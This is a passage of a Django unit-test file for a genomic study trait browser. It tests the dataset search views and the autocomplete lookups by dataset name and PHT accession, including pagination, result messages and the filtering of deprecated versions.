"""Unit tests for SourceDatasetSearch view."""
def get_url(self, *args):
return reverse('trait_browser:source:datasets:search')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data_with_empty_form(self):
"""View has the correct context upon initial load."""
response = self.client.get(self.get_url())
context = response.context
self.assertIsInstance(context['form'], forms.SourceDatasetSearchForm)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_blank_form(self):
"""View has the correct context upon invalid form submission."""
response = self.client.get(self.get_url(), {'description': ''})
context = response.context
self.assertTrue(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_valid_search_and_no_results(self):
"""View has correct context with a valid search but no results."""
response = self.client.get(self.get_url(), {'description': 'test'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
def test_context_data_with_valid_search_and_some_results(self):
"""View has correct context with a valid search and existing results."""
dataset = factories.SourceDatasetFactory.create(i_dbgap_description='lorem ipsum')
factories.SourceDatasetFactory.create(i_dbgap_description='other')
response = self.client.get(self.get_url(), {'description': 'lorem'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(dataset)])
def test_context_data_with_valid_search_and_a_specified_study(self):
"""View has correct context with a valid search and existing results if a study is selected."""
dataset = factories.SourceDatasetFactory.create(i_dbgap_description='lorem ipsum')
study = dataset.source_study_version.study
factories.SourceDatasetFactory.create(i_dbgap_description='lorem other')
get = {'description': 'lorem', 'studies': [study.pk]}
response = self.client.get(self.get_url(), get)
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(dataset)])
def test_context_data_with_valid_search_and_dataset_name(self):
"""View has correct context with a valid search and existing results if a study is selected."""
study = factories.StudyFactory.create()
dataset = factories.SourceDatasetFactory.create(i_dbgap_description='lorem ipsum', dataset_name='dolor',
source_study_version__study=study)
factories.SourceDatasetFactory.create(i_dbgap_description='lorem other', dataset_name='tempor')
response = self.client.get(self.get_url(), {'description': 'lorem', 'name': 'dolor'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(dataset)])
def test_context_data_no_messages_for_initial_load(self):
"""No messages are displayed on initial load of page."""
response = self.client.get(self.get_url())
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_no_messages_for_invalid_form(self):
"""No messages are displayed if form is invalid."""
response = self.client.get(self.get_url(), {'description': '', 'name': ''})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_info_message_for_no_results(self):
"""A message is displayed if no results are found."""
response = self.client.get(self.get_url(), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '0 results found.')
def test_context_data_info_message_for_one_result(self):
"""A message is displayed if one result is found."""
factories.SourceDatasetFactory.create(i_dbgap_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '1 result found.')
def test_context_data_info_message_for_multiple_result(self):
"""A message is displayed if two results are found."""
factories.SourceDatasetFactory.create(i_dbgap_description='lorem ipsum')
factories.SourceDatasetFactory.create(i_dbgap_description='lorem ipsum 2')
response = self.client.get(self.get_url(), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '2 results found.')
def test_table_pagination(self):
"""Table pagination works correctly on the first page."""
n_datasets = TABLE_PER_PAGE + 2
factories.SourceDatasetFactory.create_batch(n_datasets, i_dbgap_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertEqual(len(context['results_table'].rows), n_datasets)
def test_form_works_with_table_pagination_on_second_page(self):
"""Table pagination works correctly on the second page."""
n_datasets = TABLE_PER_PAGE + 2
factories.SourceDatasetFactory.create_batch(n_datasets, i_dbgap_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem', 'page': 2})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertEqual(len(context['results_table'].rows), n_datasets)
def test_table_ordering(self):
"""Traits are ordered by study and then dataset accession."""
study_1 = factories.StudyFactory.create(i_accession=2)
dataset_1 = factories.SourceDatasetFactory.create(i_accession=4, source_study_version__study=study_1,
i_dbgap_description='lorem')
dataset_2 = factories.SourceDatasetFactory.create(i_accession=3, source_study_version__study=study_1,
i_dbgap_description='lorem')
study_2 = factories.StudyFactory.create(i_accession=1)
dataset_3 = factories.SourceDatasetFactory.create(i_accession=2, source_study_version__study=study_2,
i_dbgap_description='lorem')
dataset_4 = factories.SourceDatasetFactory.create(i_accession=1, source_study_version__study=study_2,
i_dbgap_description='lorem')
dataset = factories.SourceDatasetFactory.create()
response = self.client.get(self.get_url(), {'description': 'lorem'})
context = response.context
table = context['results_table']
self.assertEqual(list(table.data), [dataset_4, dataset_3, dataset_2, dataset_1])
def test_reset_button_works_on_initial_page(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(), {'reset': 'Reset'}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_reset_button_works_with_data_in_form(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(), {'reset': 'Reset', 'name': ''}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_short_words_in_description_are_removed(self):
"""Short words are properly removed."""
dataset_1 = factories.SourceDatasetFactory.create(i_dbgap_description='lorem ipsum')
dataset_2 = factories.SourceDatasetFactory.create(i_dbgap_description='lorem')
response = self.client.get(self.get_url(), {'description': 'lorem ip'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertEqual(len(context['results_table'].rows), 2)
self.assertIn(dataset_1, context['results_table'].data)
self.assertIn(dataset_2, context['results_table'].data)
def test_message_for_ignored_short_words_in_description(self):
response = self.client.get(self.get_url(), {'name': 'foo', 'description': 'lorem ip'})
context = response.context
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 2)
self.assertIn('Ignored short words in "Dataset description" field', str(messages[0]))
def test_can_find_apostrophes_in_description_field(self):
"""Can search for apostrophes."""
trait = factories.SourceDatasetFactory.create(i_dbgap_description="don't miss me")
response = self.client.get(self.get_url(), {'description': "don't"})
context = response.context
self.assertIn(trait, context['results_table'].data)
def test_can_find_underscores_in_description_field(self):
"""Can search for undescores."""
trait = factories.SourceDatasetFactory.create(i_dbgap_description='description with_char')
response = self.client.get(self.get_url(), {'description': 'with_char'})
context = response.context
self.assertIn(trait, context['results_table'].data)
class StudySourceDatasetSearchTest(UserLoginTestCase):
def setUp(self):
super(StudySourceDatasetSearchTest, self).setUp()
self.study = factories.StudyFactory.create()
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:datasets:search', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.study.pk))
self.assertEqual(response.status_code, 200)
def test_view_with_invalid_pk(self):
"""View returns 404 response code when the pk doesn't exist."""
response = self.client.get(self.get_url(self.study.pk + 1))
self.assertEqual(response.status_code, 404)
def test_context_data_with_empty_form(self):
"""View has the correct context upon initial load."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIsInstance(context['form'], forms.SourceDatasetSearchForm)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_blank_form(self):
"""View has the correct context upon invalid form submission."""
response = self.client.get(self.get_url(self.study.pk), {'description': ''})
context = response.context
self.assertTrue(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_valid_search_and_no_results(self):
"""View has correct context with a valid search but no results."""
response = self.client.get(self.get_url(self.study.pk), {'description': 'test'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
def test_context_data_with_valid_search_and_some_results(self):
"""View has correct context with a valid search and existing results."""
dataset = factories.SourceDatasetFactory.create(
i_dbgap_description='lorem ipsum',
source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(dataset)])
def test_context_data_only_finds_results_in_requested_study(self):
"""View has correct context with a valid search and existing results if a study is selected."""
dataset = factories.SourceDatasetFactory.create(
i_dbgap_description='lorem ipsum',
source_study_version__study=self.study)
factories.SourceDatasetFactory.create(i_dbgap_description='lorem ipsum')
get = {'description': 'lorem'}
response = self.client.get(self.get_url(self.study.pk), get)
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(dataset)])
def test_context_data_with_valid_search_and_trait_name(self):
"""View has correct context with a valid search and existing results if a study is selected."""
dataset = factories.SourceDatasetFactory.create(
i_dbgap_description='lorem ipsum',
dataset_name='dolor',
source_study_version__study=self.study)
factories.SourceDatasetFactory.create(
i_dbgap_description='lorem other',
dataset_name='tempor',
source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem', 'name': 'dolor'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(dataset)])
def test_context_data_no_messages_for_initial_load(self):
"""No messages are displayed on initial load of page."""
response = self.client.get(self.get_url(self.study.pk))
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_no_messages_for_invalid_form(self):
"""No messages are displayed if form is invalid."""
response = self.client.get(self.get_url(self.study.pk), {'description': ''})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_info_message_for_no_results(self):
"""A message is displayed if no results are found."""
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '0 results found.')
def test_context_data_info_message_for_one_result(self):
"""A message is displayed if one result is found."""
factories.SourceDatasetFactory.create(
i_dbgap_description='lorem ipsum',
source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '1 result found.')
def test_context_data_info_message_for_multiple_result(self):
"""A message is displayed if two results are found."""
factories.SourceDatasetFactory.create_batch(2, i_dbgap_description='lorem ipsum',
source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '2 results found.')
def test_reset_button_works_on_initial_page(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(self.study.pk), {'reset': 'Reset'}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_reset_button_works_with_data_in_form(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(self.study.pk), {'reset': 'Reset', 'name': ''}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_short_words_are_removed(self):
"""Short words are properly removed."""
dataset_1 = factories.SourceDatasetFactory.create(
i_dbgap_description='lorem ipsum',
source_study_version__study=self.study
)
dataset_2 = factories.SourceDatasetFactory.create(
i_dbgap_description='lorem ipsum',
source_study_version__study=self.study
)
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem ip'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceDatasetTableFull)
self.assertEqual(len(context['results_table'].rows), 2)
self.assertIn(dataset_1, context['results_table'].data)
self.assertIn(dataset_2, context['results_table'].data)
def test_message_for_ignored_short_words(self):
response = self.client.get(self.get_url(self.study.pk), {'description': 'lorem ip'})
context = response.context
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 2)
self.assertIn('Ignored short words in "Dataset description" field', str(messages[0]))
def test_can_find_apostrophes_in_description_field(self):
"""Can search for apostrophes."""
trait = factories.SourceDatasetFactory.create(i_dbgap_description="don't miss me",
source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': "don't"})
context = response.context
self.assertIn(trait, context['results_table'].data)
def test_can_find_underscores_in_description_field(self):
"""Can search for undescores."""
trait = factories.SourceDatasetFactory.create(i_dbgap_description='description with_char',
source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk), {'description': 'with_char'})
context = response.context
self.assertIn(trait, context['results_table'].data)
class SourceDatasetNameAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(SourceDatasetNameAutocompleteTest, self).setUp()
# Create 10 source datasets.
self.source_datasets = []
self.TEST_DATASETS = ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'cdefgh', 'bcdefa',
'other1', 'other2', 'other3']
self.TEST_NAME_QUERIES = {
'a': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefa'],
'abc': ['abcde', 'abcdef', 'abcd_ef', 'abcd123'],
'abcd1': ['abcd123'],
'b': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'bcdefa'],
'abcde': ['abcde', 'abcdef'],
'abcdef': ['abcdef'],
}
for dataset_name in self.TEST_DATASETS:
self.source_datasets.append(factories.SourceDatasetFactory.create(dataset_name=dataset_name))
def get_url(self, *args):
return reverse('trait_browser:source:datasets:autocomplete:by-name', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
tmp = self.get_url()
response = self.client.get(tmp)
self.assertEqual(response.status_code, 200)
def test_returns_all_datasets_with_no_query(self):
"""Queryset returns all of the datasets with no query."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))
def test_no_deprecated_datasets_in_queryset(self):
"""Queryset returns only the latest version of a dataset."""
models.SourceDataset.objects.all().delete()
dataset_1 = factories.SourceDatasetFactory.create(source_study_version__i_is_deprecated=True)
dataset_2 = factories.SourceDatasetFactory.create(source_study_version__i_is_deprecated=False)
url = self.get_url()
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset_2.pk])
def test_correct_dataset_found_by_name(self):
"""Queryset returns only the correct dataset when found by whole dataset name."""
dataset_name = 'my_unlikely_dataset_name'
dataset = factories.SourceDatasetFactory.create(dataset_name=dataset_name)
url = self.get_url()
response = self.client.get(url, {'q': dataset_name})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset.i_id])
def test_correct_dataset_found_by_case_insensitive_name(self):
"""Queryset returns only the correct source dataset when found by whole name, with mismatched case."""
dataset_name = 'my_unlikely_dataset_name'
dataset = factories.SourceDatasetFactory.create(dataset_name=dataset_name)
url = self.get_url()
response = self.client.get(url, {'q': dataset_name.upper()})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset.i_id])
def test_name_test_queries(self):
"""Returns only the correct source dataset for each of the TEST_NAME_QUERIES."""
url = self.get_url()
for query in self.TEST_NAME_QUERIES.keys():
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_NAME_QUERIES[query]
self.assertEqual(len(returned_pks), len(expected_matches),
msg='Did not find correct number of matches for query {}'.format(query))
# Make sure the matches found are those that are expected.
for expected_name in expected_matches:
name_queryset = models.SourceDataset.objects.filter(dataset_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg='Could not find expected dataset name {} with query {}'.format(expected_name, query))
class StudySourceDatasetNameAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(StudySourceDatasetNameAutocompleteTest, self).setUp()
self.study = factories.StudyFactory.create()
self.source_study_version = factories.SourceStudyVersionFactory.create(study=self.study)
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_datasets = []
self.TEST_DATASETS = ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'cdefgh', 'bcdefa',
'other1', 'other2', 'other3']
self.TEST_NAME_QUERIES = {
'a': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefa'],
'abc': ['abcde', 'abcdef', 'abcd_ef', 'abcd123'],
'abcd1': ['abcd123'],
'b': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'bcdefa'],
'abcde': ['abcde', 'abcdef'],
'abcdef': ['abcdef'],
}
for dataset_name in self.TEST_DATASETS:
self.source_datasets.append(factories.SourceDatasetFactory.create(
source_study_version=self.source_study_version, dataset_name=dataset_name))
self.user.refresh_from_db()
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:datasets:autocomplete:by-name', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
tmp = self.get_url(self.study.pk)
response = self.client.get(tmp)
self.assertEqual(response.status_code, 200)
def test_returns_all_datasets_with_no_query(self):
"""Queryset returns all of the datasets with no query."""
url = self.get_url(self.study.pk)
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))
def test_no_deprecated_datasets_in_queryset(self):
"""Queryset returns only the latest version of a dataset."""
# Copy the source study version and increment it.
source_study_version2 = copy(self.source_study_version)
source_study_version2.i_version += 1
source_study_version2.i_id += 1
source_study_version2.save()
# Make the old ssv deprecated.
self.source_study_version.i_is_deprecated = True
self.source_study_version.save()
# Copy the source datasets and increment their versions. Link it to the new ssv.
datasets2 = []
for dataset in self.source_datasets:
d2 = copy(dataset)
d2.source_study_version = source_study_version2
d2.i_id = dataset.i_id + len(self.source_datasets)
d2.save()
datasets2.append(d2)
# Get results from the autocomplete view and make sure only the new versions are found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), len(datasets2))
for dataset in datasets2:
self.assertIn(dataset.i_id, returned_pks)
for dataset in self.source_datasets:
self.assertNotIn(dataset.i_id, returned_pks)
def test_other_study_not_in_queryset(self):
"""Queryset returns only datasets belonging to the appropriate study."""
# Delete all but five source traits, so that there are 5 from each study.
study2 = factories.StudyFactory.create()
datasets2 = factories.SourceDatasetFactory.create_batch(
5, source_study_version__study=study2)
# Get results from the autocomplete view and make sure only datasets from the correct study are found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that the other study's datasets do not show up.
self.assertEqual(len(returned_pks), len(self.source_datasets))
for dataset in datasets2:
self.assertNotIn(dataset.i_id, returned_pks)
for dataset in self.source_datasets:
self.assertIn(dataset.i_id, returned_pks)
def test_correct_dataset_found_by_name(self):
"""Queryset returns only the correct dataset when found by whole dataset name."""
dataset_name = 'my_unlikely_dataset_name'
dataset = factories.SourceDatasetFactory.create(
dataset_name=dataset_name,
source_study_version=self.source_study_version
)
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': dataset_name})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset.i_id])
def test_correct_dataset_found_by_case_insensitive_name(self):
"""Queryset returns only the correct source trait when found by whole name, with mismatched case."""
dataset_name = 'my_unlikely_dataset_name'
dataset = factories.SourceDatasetFactory.create(
dataset_name=dataset_name,
source_study_version=self.source_study_version
)
url = self.get_url(self.study.pk)
response = self.client.get(url, {'q': dataset_name.upper()})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset.i_id])
def test_name_test_queries(self):
"""Returns only the correct source trait for each of the TEST_NAME_QUERIES."""
url = self.get_url(self.study.pk)
for query in self.TEST_NAME_QUERIES.keys():
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_NAME_QUERIES[query]
self.assertEqual(len(returned_pks), len(expected_matches),
msg='Did not find correct number of matches for query {}'.format(query))
# Make sure the matches found are those that are expected.
for expected_name in expected_matches:
name_queryset = models.SourceDataset.objects.filter(dataset_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg='Could not find expected dataset name {} with query {}'.format(expected_name, query))
class SourceDatasetPHTAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(SourceDatasetPHTAutocompleteTest, self).setUp()
self.source_datasets = []
self.TEST_PHTS = (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, )
self.TEST_PHT_QUERIES = {
'5': (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, ),
'05': (),
'0005': (500, 555, 520, ),
'000005': (5, ),
'52': (52, 520, 5200, ),
'052': (),
'0052': (5200, ),
'00052': (520, ),
'555555': (555555, ),
'0': (5, 50, 500, 55, 555, 52, 520, 5200, ),
}
for pht in self.TEST_PHTS:
self.source_datasets.append(factories.SourceDatasetFactory.create(i_accession=pht))
def get_url(self, *args):
return reverse('trait_browser:source:datasets:autocomplete:by-pht', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
tmp = self.get_url()
response = self.client.get(tmp)
self.assertEqual(response.status_code, 200)
def test_returns_all_datasets_with_no_query(self):
"""Queryset returns all of the datasets with no query."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))
def test_no_deprecated_datasets_in_queryset(self):
"""Queryset returns only the latest version of a dataset."""
models.SourceDataset.objects.all().delete()
dataset_1 = factories.SourceDatasetFactory.create(source_study_version__i_is_deprecated=True)
dataset_2 = factories.SourceDatasetFactory.create(source_study_version__i_is_deprecated=False)
url = self.get_url()
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [dataset_2.pk])
def test_pht_test_queries_without_pht_in_string(self):
"""Returns only the correct datasets for each of the TEST_PHT_QUERIES when 'pht' is not in query string."""
url = self.get_url()
for query in self.TEST_PHT_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHT_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_pht in expected_matches:
expected_pk = models.SourceDataset.objects.get(i_accession=expected_pht).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected pht {} with query '{}'".format(expected_pht, query))
def test_pht_test_queries_with_pht_in_string(self):
"""Returns only the correct source datasets for each of the TEST_PHT_QUERIES when 'pht' is in query string."""
url = self.get_url()
for query in self.TEST_PHT_QUERIES:
response = self.client.get(url, {'q': 'pht' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHT_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_pht in expected_matches:
expected_pk = models.SourceDataset.objects.get(i_accession=expected_pht).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected pht {} with query '{}'".format(expected_pht, query))
class StudySourceDatasetPHTAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(StudySourceDatasetPHTAutocompleteTest, self).setUp()
self.study = factories.StudyFactory.create()
self.source_study_version = factories.SourceStudyVersionFactory.create(study=self.study)
# Create 10 source traits from the same dataset, with non-deprecated ssv of version 2.
self.source_datasets = []
self.TEST_PHTS = (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, )
self.TEST_PHT_QUERIES = {
'5': (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, ),
'05': (),
'0005': (500, 555, 520, ),
'000005': (5, ),
'52': (52, 520, 5200, ),
'052': (),
'0052': (5200, ),
'00052': (520, ),
'555555': (555555, ),
'0': (5, 50, 500, 55, 555, 52, 520, 5200, ),
}
for pht in self.TEST_PHTS:
self.source_datasets.append(factories.SourceDatasetFactory.create(
source_study_version=self.source_study_version,
i_accession=pht
))
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:datasets:autocomplete:by-pht', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
tmp = self.get_url(self.study.pk)
response = self.client.get(tmp)
self.assertEqual(response.status_code, 200)
def test_returns_all_datasets_with_no_query(self):
"""Queryset returns all of the datasets with no query."""
url = self.get_url(self.study.pk)
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([dataset.pk for dataset in self.source_datasets]), sorted(pks))
def test_no_deprecated_datasets_in_queryset(self):
"""Queryset returns only the latest version of a dataset."""
# Copy the source study version and increment it.
source_study_version2 = copy(self.source_study_version)
source_study_version2.i_version += 1
source_study_version2.i_id += 1
source_study_version2.save()
# Make the old ssv deprecated.
self.source_study_version.i_is_deprecated = True
self.source_study_version.save()
# Copy the source datasets and increment their versions. Link it to the new ssv.
datasets2 = []
for dataset in self.source_datasets:
d2 = copy(dataset)
d2.source_study_version = source_study_version2
d2.i_id = dataset.i_id + len(self.source_datasets)
d2.save()
datasets2.append(d2)
# Get results from the autocomplete view and make sure only the new versions are found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(len(returned_pks), len(datasets2))
for dataset in datasets2:
self.assertIn(dataset.i_id, returned_pks)
for dataset in self.source_datasets:
self.assertNotIn(dataset.i_id, returned_pks)
def test_other_study_not_in_queryset(self):
"""Queryset returns only datasets belonging to the appropriate study."""
# Delete all but five source traits, so that there are 5 from each study.
study2 = factories.StudyFactory.create()
datasets2 = factories.SourceDatasetFactory.create_batch(
5, source_study_version__study=study2)
# Get results from the autocomplete view and make sure only datasets from the correct study are found.
url = self.get_url(self.study.pk)
response = self.client.get(url)
returned_pks = get_autocomplete_view_ids(response)
# Make sure that the other study's datasets do not show up.
self.assertEqual(len(returned_pks), len(self.source_datasets))
for dataset in datasets2:
self.assertNotIn(dataset.i_id, returned_pks)
for dataset in self.source_datasets:
self.assertIn(dataset.i_id, returned_pks)
def test_pht_test_queries_without_pht_in_string(self):
"""Returns only the correct datasets for each of the TEST_PHT_QUERIES when 'pht' is not in query string."""
url = self.get_url(self.study.pk)
for query in self.TEST_PHT_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHT_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_pht in expected_matches:
expected_pk = models.SourceDataset.objects.get(i_accession=expected_pht).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected pht {} with query '{}'".format(expected_pht, query))
def test_pht_test_queries_with_pht_in_string(self):
"""Returns only the correct source datasets for each of the TEST_PHT_QUERIES when 'pht' is in query string."""
url = self.get_url(self.study.pk)
for query in self.TEST_PHT_QUERIES:
response = self.client.get(url, {'q': 'pht' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHT_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_pht in expected_matches:
expected_pk = models.SourceDataset.objects.get(i_accession=expected_pht).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected pht {} with query '{}'".format(expected_pht, query))
class SourceDatasetNameOrPHTAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(SourceDatasetNameOrPHTAutocompleteTest, self).setUp()
# Create 10 source datasets.
self.source_datasets = []
self.TEST_PHTS = (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, )
self.TEST_NAMES = ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'cdefgh', 'bcdefa',
'other1', 'other2', 'other3']
self.TEST_PHT_QUERIES = {
'5': (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, ),
'05': (),
'0005': (500, 555, 520, ),
'000005': (5, ),
'52': (52, 520, 5200, ),
'052': (),
'0052': (5200, ),
'00052': (520, ),
'555555': (555555, ),
'0': (5, 50, 500, 55, 555, 52, 520, 5200, ),
}
self.TEST_NAME_QUERIES = {
